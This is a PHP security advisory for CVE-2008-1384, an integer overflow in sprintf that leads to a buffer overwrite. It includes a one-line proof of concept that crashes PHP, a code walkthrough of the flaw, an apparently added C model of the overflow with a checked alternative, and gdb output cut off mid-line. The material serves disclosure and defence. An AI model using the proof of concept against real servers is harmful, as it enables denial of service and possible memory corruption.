-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- Written: 01.03.2008
- Public: 20.03.2008

SecurityReason Research
SecurityAlert Id: 52

CVE-2008-1384
SecurityRisk: Low

Affected Software: PHP 5.2.5 and prior
Advisory URL:
http://securityreason.com/achievement_securityalert/52
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular expression and URL handling sections.

For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape sequences, see the Strings entry in the Types section of the manual.

--- 1. *printf() functions Integer Overflow ---
The main problem exists in the formatted_print.c file.

cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
<?php
sprintf("[%'A2147483646s]\n", "A");
?>
cxib# php /www/printf.php
Segmentation fault (core dumped)

Good. Let's look at the php_sprintf_appendstring() function in formatted_print.c.
=0D
---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
                         int min_width, int max_width, char padding,
                         int alignment, int len, int neg, int expprec, int always_sign)
---formatted_print.c-end---
=0D
The main variable to watch is "npad".

---formatted_print.c-start---
copy_len = (expprec ? MIN(max_width, len) : len);
npad = min_width - copy_len;
---formatted_print.c-end---
=0D
Good. npad is 2147483646.

---formatted_print.c-start---
req_size = *pos + MAX(min_width, copy_len) + 1;
---formatted_print.c-end---
=0D
req_size overflows here: the addition is done on a plain int, so the result wraps negative.
=0D
---formatted_print.c-start---
if (req_size > *size) {
    while (req_size > *size) {
        *size <<= 1;
    }
    PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));
    *buffer = erealloc(*buffer, *size);
}
---formatted_print.c-end---
=0D
(req_size > *size) is false, so the buffer is never enlarged.

(alignment == ALIGN_RIGHT) is true, so
=0D
---formatted_print.c-start---
while (npad-- > 0) {
    (*buffer)[(*pos)++] = padding;
}
---formatted_print.c-end---
=0D
and that is where it ends: the padding loop writes past the buffer. Let's debug it with gdb.
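The arithmetic walked through above, modelled as an added C example (this is not PHP's source and not PHP's fix): it reproduces the req_size computation with the PoC's values, shows why the grow check is skipped, and contrasts it with an overflow-checked computation. The initial buffer size of 240 is an assumption for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define MAX(a, b) ((a) > (b) ? (a) : (b))

/* Model of the vulnerable line in php_sprintf_appendstring():
 *     req_size = *pos + MAX(min_width, copy_len) + 1;
 * All operands are plain int, so a width near INT_MAX wraps req_size
 * negative. The wrap is modelled on uint32_t (signed overflow is undefined
 * behaviour in C) and the result reinterpreted as a two's-complement int32. */
static int32_t vulnerable_req_size(int32_t pos, int32_t min_width, int32_t copy_len)
{
    uint32_t r = (uint32_t)pos + (uint32_t)MAX(min_width, copy_len) + 1u;
    return (int32_t)r;
}

/* The grow check `if (req_size > *size)`: a wrapped (negative) req_size never
 * exceeds *size, so erealloc() is skipped and the padding loop later writes
 * min_width bytes into a buffer that was never enlarged. */
static bool vulnerable_grow_triggered(int32_t pos, int32_t min_width,
                                      int32_t copy_len, int32_t size)
{
    return vulnerable_req_size(pos, min_width, copy_len) > size;
}

/* Hardened computation (added here; not PHP's own fix): do the sum in 64 bits
 * and refuse anything that does not fit an int. Returns -1 on overflow or
 * negative input, otherwise the required size. */
static int64_t checked_req_size(int32_t pos, int32_t min_width, int32_t copy_len)
{
    if (pos < 0 || min_width < 0 || copy_len < 0)
        return -1;
    int64_t r = (int64_t)pos + (int64_t)MAX(min_width, copy_len) + 1;
    return r > INT32_MAX ? -1 : r;
}

int main(void)
{
    /* Advisory PoC "[%'A2147483646s]" with argument "A": '[' was already
     * appended, so pos = 1; copy_len = strlen("A") = 1. The initial buffer
     * size of 240 is an assumption for illustration. */
    int32_t pos = 1, width = 2147483646, copy_len = 1, size = 240;
    printf("vulnerable req_size = %d\n", vulnerable_req_size(pos, width, copy_len));
    printf("buffer grown? %s\n", vulnerable_grow_triggered(pos, width, copy_len, size) ? "yes" : "no");
    printf("checked req_size = %lld\n", (long long)checked_req_size(pos, width, copy_len));
    return 0;
}
```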
=0D
--- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c,
size=0xbfbfd324, add=0x28f20404 'A'